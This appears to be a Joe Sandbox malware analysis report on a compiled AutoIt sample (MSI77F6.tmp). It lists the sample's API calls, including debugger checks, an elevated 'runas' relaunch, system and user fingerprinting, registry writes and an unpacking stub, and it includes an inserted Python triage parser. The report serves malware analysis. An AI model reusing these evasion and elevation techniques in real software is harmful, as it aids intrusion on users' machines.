7d252f 109209->109213 109210 7d268a 109215 7d274c CreateProcessW 109210->109215 109216 7d26c1 109210->109216 109211->109210 109249 7ba17a 8 API calls 109211->109249 109217 77ca8e 48 API calls 109212->109217 109218 773bcf 48 API calls 109213->109218 109230 7d276b 109215->109230 109252 7abc90 69 API calls 109216->109252 109217->109211 109221 7d2539 109218->109221 109219 7d2655 109250 7ba073 8 API calls 109219->109250 109224 7d256f GetSystemDirectoryW 109221->109224 109227 7784a6 81 API calls 109221->109227 109223 7d2670 109251 7ba102 8 API calls 109223->109251 109226 79010a 48 API calls 109224->109226 109228 7d2594 GetSystemDirectoryW 109226->109228 109229 7d2550 109227->109229 109228->109198 109231 773bcf 48 API calls 109229->109231 109232 7d27bd CloseHandle 109230->109232 109233 7d2780 109230->109233 109234 7d255a __NMSG_WRITE 109231->109234 109235 7d27cb 109232->109235 109241 7d27f5 109232->109241 109237 7d2791 GetLastError 109233->109237 109234->109198 109234->109224 109253 7b9d09 CloseHandle Mailbox 109235->109253 109236 7d27fb 109239 7d27a5 109236->109239 109237->109239 109254 7b9b29 CloseHandle 109239->109254 109241->109236 109244 7d2827 CloseHandle 109241->109244 109244->109239 109245 7d1f2b 109245->107445 109248 7d26df __NMSG_WRITE 109248->109230 109249->109219 109250->109223 109251->109210 109252->109248 109254->109245 109255->107646 109257 77d89e 50 API calls 109256->109257 109258 771a08 109257->109258 109259 7edb7d 109258->109259 109260 771a12 109258->109260 109261 777e53 48 API calls 109259->109261 109262 7784a6 81 API calls 109260->109262 109263 7edb8d 109261->109263 109264 771a1f 109262->109264 109263->109263 109265 77c935 48 API calls 109264->109265 109266 771a2d 109265->109266 109267 771dce 109266->109267 109268 771de4 Mailbox 109267->109268 109269 7edb26 109268->109269 109272 771dfd 109268->109272 109270 7edb2b IsWindow 109269->109270 109273 7edb3f 109270->109273 109274 771e51 109270->109274 109271 771e46 109271->109274 109277 7edb65 IsWindow 
109271->109277 109272->109271 109275 7784a6 81 API calls 109272->109275 109358 77200a 109273->109358 109274->107664 109274->107665 109278 771e17 109275->109278 109277->109273 109277->109274 109305 771f04 109278->109305 109283 77c4cd 48 API calls 109282->109283 109284 7ae2fe 109283->109284 109403 77193b SendMessageTimeoutW 109284->109403 109286 7ae305 109298 7ae309 Mailbox 109286->109298 109404 7ae390 109286->109404 109288 7ae314 109289 79010a 48 API calls 109288->109289 109290 7ae338 SendMessageW 109289->109290 109290->109298 109298->107670 109300 777c3a 109299->109300 109302 777bfb 109299->109302 109301 77c935 48 API calls 109300->109301 109304 777c0e 109301->109304 109303 79010a 48 API calls 109302->109303 109303->109304 109304->107672 109306 771f1a Mailbox 109305->109306 109307 77c935 48 API calls 109306->109307 109308 771f3e 109307->109308 109309 77c935 48 API calls 109308->109309 109310 771f49 109309->109310 109311 777e53 48 API calls 109310->109311 109312 771f59 109311->109312 109313 77d3d2 48 API calls 109312->109313 109314 771f87 109313->109314 109315 77d3d2 48 API calls 109314->109315 109316 771f90 109315->109316 109317 77d3d2 48 API calls 109316->109317 109318 771f99 109317->109318 109319 7e2569 109318->109319 109320 771fac 109318->109320 109359 772016 109358->109359 109360 79010a 48 API calls 109359->109360 109361 772023 109360->109361 109362 77197e 109361->109362 109363 771990 109362->109363 109367 7719af _memmove 109362->109367 109366 79010a 48 API calls 109363->109366 109364 79010a 48 API calls 109365 7719c6 109364->109365 109365->109274 109366->109367 109367->109364 109403->109286 109429 77193b SendMessageTimeoutW 109404->109429 109406 7ae39a 109407 7ae39e 109406->109407 109408 7ae3a2 SendMessageW 109406->109408 109407->109288 109408->109288 109429->109406 109430->107686 109431->107701 109432->107701 109433->107713 109434->107706 109435->107701 109436->107703 109437->107722 109438->107734 109439->107745 109440->107742 109442 7b7700 109441->109442 
109453 7b76f9 _wcsncpy 109441->109453 109443 79010a 48 API calls 109442->109443 109444 7b7706 GetFileVersionInfoW 109443->109444 109445 7b7722 __NMSG_WRITE 109444->109445 109446 79010a 48 API calls 109445->109446 109448 7b7739 _wcscat _wcscmp _wcscpy _wcsstr 109446->109448 109447 791bc7 _W_store_winword 59 API calls 109449 7b77f7 109447->109449 109451 7b7779 751C1560 109448->109451 109455 7b7793 _wcscat 109448->109455 109450 7b7827 751C1560 109449->109450 109449->109453 109452 7b783d _wcscmp 109450->109452 109450->109453 109451->109455 109452->109453 109456 79234b 80 API calls 3 library calls 109452->109456 109453->107759 109455->109447 109456->109453 109458 78f069 109457->109458 109459 78f057 109457->109459 109460 77c4cd 48 API calls 109458->109460 109461 78f05d 109459->109461 109462 78f063 109459->109462 109473 7b64f5 109460->109473 109464 77a6d4 48 API calls 109461->109464 109463 77a6d4 48 API calls 109462->109463 109465 7b668b 109463->109465 109467 78f081 109464->109467 109468 774c4f 50 API calls 109465->109468 109466 7b6524 109466->107802 109486 774c4f 109467->109486 109472 7b6699 109468->109472 109479 7b66a9 Mailbox 109472->109479 109494 7b6765 50 API calls 109472->109494 109473->109466 109492 7b649b ReadFile SetFilePointerEx 109473->109492 109493 77bd2f 48 API calls _memmove 109473->109493 109474 7e49b2 109475 77c610 50 API calls 109478 78f0a3 Mailbox 109475->109478 109478->107802 109479->107802 109480->107779 109481->107807 109482->107776 109483->107782 109484->107798 109485->107805 109487 78f324 48 API calls 109486->109487 109488 774c60 109487->109488 109489 774ca0 2 API calls 109488->109489 109490 774c95 109488->109490 109495 774d29 109488->109495 109489->109488 109490->109474 109490->109475 109492->109473 109493->109473 109494->109479 109496 7e45cf 109495->109496 109497 774d3d 109495->109497 109499 77a6f8 48 API calls 109496->109499 109504 774d67 109497->109504 109501 7e45da 109499->109501 109500 774d49 109500->109488 109502 79010a 48 API calls 
                                        Control-flow Graph (executed-function call graph; the node and edge list is elided, only the API names on the nodes are kept)
                                        • Networking: WSAStartup, gethostname, gethostbyname, inet_ntoa, inet_addr, htons, WSACleanup (the chain at 7b78ee calls WSAStartup, gethostname, gethostbyname and inet_ntoa, i.e. a lookup of the local host's IP address)
                                        • Registry: RegOpenKeyExW, RegQueryValueExW, RegCloseKey
                                        • Host and user fingerprinting: GetVersionExW, GetSystemInfo, GetNativeSystemInfo, GetCurrentProcess, GetUserNameW, GetModuleFileNameW, SHGetFolderPathW, IsProcessorFeaturePresent, FindFirstFileW, FindClose
                                        • Dynamic API resolution and memory protection: LoadLibraryA, GetProcAddress, FreeLibrary, VirtualProtect, ExitProcess; the node chain at 8da0c0 (inside the 008DA000 region listed under Memory Dump Source) resolves imports with LoadLibraryA/GetProcAddress, calls VirtualProtect twice and ends in ExitProcess, the pattern of a run-time unpacking/import-fixup stub
                                        • Window, tray and timer handling: SetTimer, KillTimer, RegisterClipboardFormatW, CreatePopupMenu, Shell_NotifyIconW, PostQuitMessage, NtdllDefWindowProc_W, MoveWindow, SetFocus, DeleteObject, DestroyWindow, LoadStringW, GetWindowRect, ClientToScreen, CharUpperBuffW
                                        • COM/variant and string conversion: VariantInit, VariantClear, WideCharToMultiByte, MultiByteToWideChar, InterlockedDecrement
                                        • CRT start-up: GetStartupInfoW, GetProcessHeap, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetStdHandle, GetFileType, InitializeCriticalSectionAndSpinCount, RtlEnterCriticalSection, RtlLeaveCriticalSection, RtlAllocateHeap, RtlFreeHeap, GetLastError, Sleep, GetModuleHandleExW

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0077376D
                                          • Part of subcall function 00774257: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI77F6.tmp,00000104,?,00000000,00000001,00000000), ref: 0077428C
                                        • IsDebuggerPresent.KERNEL32(?,?), ref: 0077377F
                                        • GetFullPathNameW.KERNEL32(C:\Windows\Installer\MSI77F6.tmp,00000104,?,00831120,C:\Windows\Installer\MSI77F6.tmp,00831124,?,?), ref: 007737EE
                                          • Part of subcall function 007734F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0077352A
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00773860
                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00822934,00000010), ref: 007E21C5
                                        • SetCurrentDirectoryW.KERNEL32(?,?), ref: 007E21FD
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 007E2232
                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0080DAA4), ref: 007E2290
                                        • ShellExecuteW.SHELL32(00000000), ref: 007E2297
                                          • Part of subcall function 007730A5: GetSysColorBrush.USER32(0000000F), ref: 007730B0
                                          • Part of subcall function 007730A5: LoadCursorW.USER32(00000000,00007F00), ref: 007730BF
                                          • Part of subcall function 007730A5: LoadIconW.USER32(00000063), ref: 007730D5
                                          • Part of subcall function 007730A5: LoadIconW.USER32(000000A4), ref: 007730E7
                                          • Part of subcall function 007730A5: LoadIconW.USER32(000000A2), ref: 007730F9
                                          • Part of subcall function 007730A5: RegisterClassExW.USER32(?), ref: 00773167
                                          • Part of subcall function 00772E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00772ECB
                                          • Part of subcall function 00772E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00772EEC
                                          • Part of subcall function 00772E9D: ShowWindow.USER32(00000000), ref: 00772F00
                                          • Part of subcall function 00772E9D: ShowWindow.USER32(00000000), ref: 00772F09
                                          • Part of subcall function 00773598: _memset.LIBCMT ref: 007735BE
                                          • Part of subcall function 00773598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00773667
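To make a listing like the one above machine-checkable, here is an added example (not code from the Joe Sandbox report, from Joe Security or from the sample): a Python parser for the report's `API.MODULE(args), ref: ADDR` bullet format, including the indented `Part of subcall function` lines, followed by a small set of triage rules whose tag names are the example's own. The sample lines are copied from the APIs list above. One caveat the example encodes: Joe Sandbox prints the stack slots live at each call site, so the `runas` verb appears as an argument of GetForegroundWindow, which takes no parameters; the verb belongs to the ShellExecuteW call seven bytes later at 007E2297, and together with the preceding GetModuleFileNameW this is consistent with the sample relaunching its own image under `runas`, i.e. a UAC elevation prompt.

```python
"""Parse the per-function "APIs" listing of a Joe Sandbox report into
structured records and flag the calls a triage analyst looks at first.
Added example; not code from the report, from Joe Security or from the sample."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Bullet lines copied from the APIs listing of the function summary above.
SAMPLE = r"""
• GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0077376D
  • Part of subcall function 00774257: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI77F6.tmp,00000104,?,00000000,00000001,00000000), ref: 0077428C
• IsDebuggerPresent.KERNEL32(?,?), ref: 0077377F
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00822934,00000010), ref: 007E21C5
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0080DAA4), ref: 007E2290
• ShellExecuteW.SHELL32(00000000), ref: 007E2297
  • Part of subcall function 00773598: _memset.LIBCMT ref: 007735BE
  • Part of subcall function 00773598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00773667
"""

# One bullet per call site: optional "Part of subcall function XXXXXXXX:" prefix,
# API.MODULE, optional "(arg,arg,...)" and the "ref: XXXXXXXX" call-site address.
LINE_RE = re.compile(
    r"^\s*(?:\u2022\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # stack slots as printed; "?" means unresolved
    ref: int                   # address of the call instruction
    subcall_of: Optional[int]  # enclosing function for "Part of subcall" lines


def parse_api_listing(text: str) -> List[ApiCall]:
    """Turn the bullet listing into ApiCall records, in report order."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        raw = m.group("args")
        # One stack slot per comma; a string argument containing a comma
        # would be split as well (none occurs in this listing).
        args = [] if raw is None else [a.strip() for a in raw.split(",")]
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


# Triage rules (tag names are this example's own). They restate why the
# report's signatures fire: the IsDebuggerPresent check, the AutoIt runtime's
# stock message box, the "runas" verb and the tray icon of the AutoIt host.
RULES = [
    ("anti-debug",     lambda c: c.api == "IsDebuggerPresent"),
    ("autoit-runtime", lambda c: c.api == "MessageBoxA"
                       and any("compiled AutoIt script" in a for a in c.args)),
    ("elevation-verb", lambda c: "runas" in c.args),
    ("shell-execute",  lambda c: c.api == "ShellExecuteW"),
    ("tray-icon",      lambda c: c.api == "Shell_NotifyIconW"),
]


def triage(calls: List[ApiCall]):
    """Return (tag, api, call-site address) for every rule hit, in report order."""
    return [(tag, c.api, c.ref) for c in calls for tag, pred in RULES if pred(c)]


def elevation_call_site(calls: List[ApiCall]) -> Optional[int]:
    """Joe Sandbox prints the stack slots live at each call, so "runas" shows
    up on GetForegroundWindow, which takes no parameters at all. The verb is
    consumed by the next ShellExecuteW; return that call's address."""
    seen_verb = False
    for c in calls:
        if "runas" in c.args:
            seen_verb = True
        elif seen_verb and c.api == "ShellExecuteW":
            return c.ref
    return None


if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE)
    for tag, api, ref in triage(parsed):
        print(f"{ref:08X} {api:<22} {tag}")
    print(f"elevated relaunch via ShellExecuteW at {elevation_call_site(parsed):08X}")
```

The rules deliberately match on the printed argument slots rather than only on API names: `runas` on the stack is the signal, whichever call Joe Sandbox happened to attribute it to, and the same approach extends to other verbs or paths (for instance a dropped file under C:\Windows) without changing the parser.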
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                        • String ID: C:\Windows\Installer\MSI77F6.tmp$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                        • API String ID: 4253510256-3328431208

                                         Control-flow Graph (graph rendering not captured in this export)
                                        APIs
                                          • Part of subcall function 007D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D2AA6,?,?), ref: 007D3B0E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D317F
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                        • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 007D321E
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007D32B6
                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007D34F5
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007D3502
                                        Similarity
                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                        • String ID:
                                        • API String ID: 1240663315-0

                                         Control-flow Graph (graph rendering not captured in this export)
                                        APIs
                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00772A33
                                        • KillTimer.USER32(?,00000001), ref: 00772A5D
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00772A80
                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00772A8B
                                        • CreatePopupMenu.USER32 ref: 00772A9F
                                        • PostQuitMessage.USER32(00000000), ref: 00772AAE
                                        Similarity
                                        • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                        • String ID: TaskbarCreated
                                        • API String ID: 157504867-2362178303
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 0078E4A7
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        • GetCurrentProcess.KERNEL32(00000000,0080DC28,?,?), ref: 0078E567
                                        • GetNativeSystemInfo.KERNEL32(?,0080DC28,?,?), ref: 0078E5BC
                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0078E5C7
                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0078E5DA
                                        • GetSystemInfo.KERNEL32(?,0080DC28,?,?), ref: 0078E5E4
                                        • GetSystemInfo.KERNEL32(?,0080DC28,?,?), ref: 0078E5F0
                                        Similarity
                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                        • String ID:
                                        • API String ID: 2717633055-0
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00773202
                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00773219
                                        • LoadResource.KERNEL32(?,00000000), ref: 007E57D7
                                        • SizeofResource.KERNEL32(?,00000000), ref: 007E57EC
                                        • LockResource.KERNEL32(?), ref: 007E57FF
                                        Similarity
                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                        • String ID: SCRIPT
                                        • API String ID: 3051347437-3967369404
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007B6F7D
                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 007B6F8D
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 007B6FAC
                                        • __wsplitpath.LIBCMT ref: 007B6FD0
                                        • _wcscat.LIBCMT ref: 007B6FE3
                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 007B7022
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                        • String ID:
                                        • API String ID: 1605983538-0
                                        APIs
                                        • LoadLibraryA.KERNEL32(?), ref: 008DA1FA
                                        • GetProcAddress.KERNEL32(?,008D3FF9), ref: 008DA218
                                        • ExitProcess.KERNEL32(?,008D3FF9), ref: 008DA229
                                        • VirtualProtect.KERNEL32(00770000,00001000,00000004,?,00000000), ref: 008DA277
                                        • VirtualProtect.KERNEL32(00770000,00001000), ref: 008DA28C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                        • String ID:
                                        • API String ID: 1996367037-0
                                        APIs
                                          • Part of subcall function 007B78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 007B78CB
                                        • CoInitialize.OLE32(00000000), ref: 007BF04D
                                        • CoCreateInstance.COMBASE(007FDA7C,00000000,00000001,007FD8EC,?), ref: 007BF066
                                        • CoUninitialize.COMBASE ref: 007BF083
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                        Similarity
                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                        • String ID: .lnk
                                        • API String ID: 2126378814-24824748
                                        APIs
                                          • Part of subcall function 0079010A: std::exception::exception.LIBCMT ref: 0079013E
                                          • Part of subcall function 0079010A: __CxxThrowException@8.LIBCMT ref: 00790153
                                        • _memmove.LIBCMT ref: 00782C63
                                        • _memmove.LIBCMT ref: 0078303A
                                        Similarity
                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                        • String ID: @
                                        • API String ID: 1300846289-2766056989
                                        Similarity
                                        • API ID:
                                        • String ID: G-w
                                        • API String ID: 0-1692400679
                                        APIs
                                        • GetFileAttributesW.KERNEL32(0077C848,0077C848), ref: 0078DDA2
                                        • FindFirstFileW.KERNEL32(0077C848,?), ref: 007E4A83
                                        Similarity
                                        • API ID: File$AttributesFindFirst
                                        • String ID:
                                        • API String ID: 4185537391-0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID:
                                        • API String ID: 3964851224-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: NameUser
                                        • String ID:
                                        • API String ID: 2645101109-0
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0077E279
                                        • timeGetTime.WINMM ref: 0077E51A
                                        • TranslateMessage.USER32(?), ref: 0077E646
                                        • DispatchMessageW.USER32(?), ref: 0077E651
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0077E664
                                        • LockWindowUpdate.USER32(00000000), ref: 0077E697
                                        • DestroyWindow.USER32 ref: 0077E6A3
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0077E6BD
                                        • Sleep.KERNEL32(0000000A), ref: 007E5B15
                                        • TranslateMessage.USER32(?), ref: 007E62AF
                                        • DispatchMessageW.USER32(?), ref: 007E62BD
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007E62D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                        • API String ID: 2641332412-570651680
                                        APIs
                                        • ___createFile.LIBCMT ref: 007A6C73
                                        • ___createFile.LIBCMT ref: 007A6CB4
                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 007A6CDD
                                        • __dosmaperr.LIBCMT ref: 007A6CE4
                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 007A6CF7
                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 007A6D1A
                                        • __dosmaperr.LIBCMT ref: 007A6D23
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 007A6D2C
                                        • __set_osfhnd.LIBCMT ref: 007A6D5C
                                        • __lseeki64_nolock.LIBCMT ref: 007A6DC6
                                        • __close_nolock.LIBCMT ref: 007A6DEC
                                        • __chsize_nolock.LIBCMT ref: 007A6E1C
                                        • __lseeki64_nolock.LIBCMT ref: 007A6E2E
                                        • __lseeki64_nolock.LIBCMT ref: 007A6F26
                                        • __lseeki64_nolock.LIBCMT ref: 007A6F3B
                                        • __close_nolock.LIBCMT ref: 007A6F9B
                                          • Part of subcall function 0079F84C: CloseHandle.KERNEL32(00000000,0081EEC4,00000000,?,007A6DF1,0081EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0079F89C
                                          • Part of subcall function 0079F84C: GetLastError.KERNEL32(?,007A6DF1,0081EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0079F8A6
                                          • Part of subcall function 0079F84C: __free_osfhnd.LIBCMT ref: 0079F8B3
                                          • Part of subcall function 0079F84C: __dosmaperr.LIBCMT ref: 0079F8D5
                                          • Part of subcall function 0079889E: __getptd_noexit.LIBCMT ref: 0079889E
                                        • __lseeki64_nolock.LIBCMT ref: 007A6FBD
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 007A70F2
                                        • ___createFile.LIBCMT ref: 007A7111
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 007A711E
                                        • __dosmaperr.LIBCMT ref: 007A7125
                                        • __free_osfhnd.LIBCMT ref: 007A7145
                                        • __invoke_watson.LIBCMT ref: 007A7173
                                        • __wsopen_helper.LIBCMT ref: 007A718D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                        • String ID: 9Ay$@
                                        • API String ID: 3896587723-2511331675

                                        Control-flow Graph

                                        APIs
                                        • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 007B76ED
                                        • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 007B7713
                                        • _wcscpy.LIBCMT ref: 007B7741
                                        • _wcscmp.LIBCMT ref: 007B774C
                                        • _wcscat.LIBCMT ref: 007B7762
                                        • _wcsstr.LIBCMT ref: 007B776D
                                        • 751C1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007B7789
                                        • _wcscat.LIBCMT ref: 007B77D2
                                        • _wcscat.LIBCMT ref: 007B77D9
                                        • _wcsncpy.LIBCMT ref: 007B7804
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscat$FileInfoVersion$C1560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                        • API String ID: 2588870415-1459072770

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        • GetForegroundWindow.USER32 ref: 00771FBE
                                        • IsWindow.USER32(?), ref: 007E282E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Foreground_memmove
                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                        • API String ID: 3828923867-1919597938

                                        Control-flow Graph

                                        APIs
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D3626
                                        • RegCreateKeyExW.KERNEL32(?,?,00000000,0080DBF0,00000000,?,00000000,?,?), ref: 007D3694
                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007D36DC
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007D3765
                                        • RegCloseKey.ADVAPI32(?), ref: 007D3A85
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007D3A92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Close$ConnectCreateRegistryValue
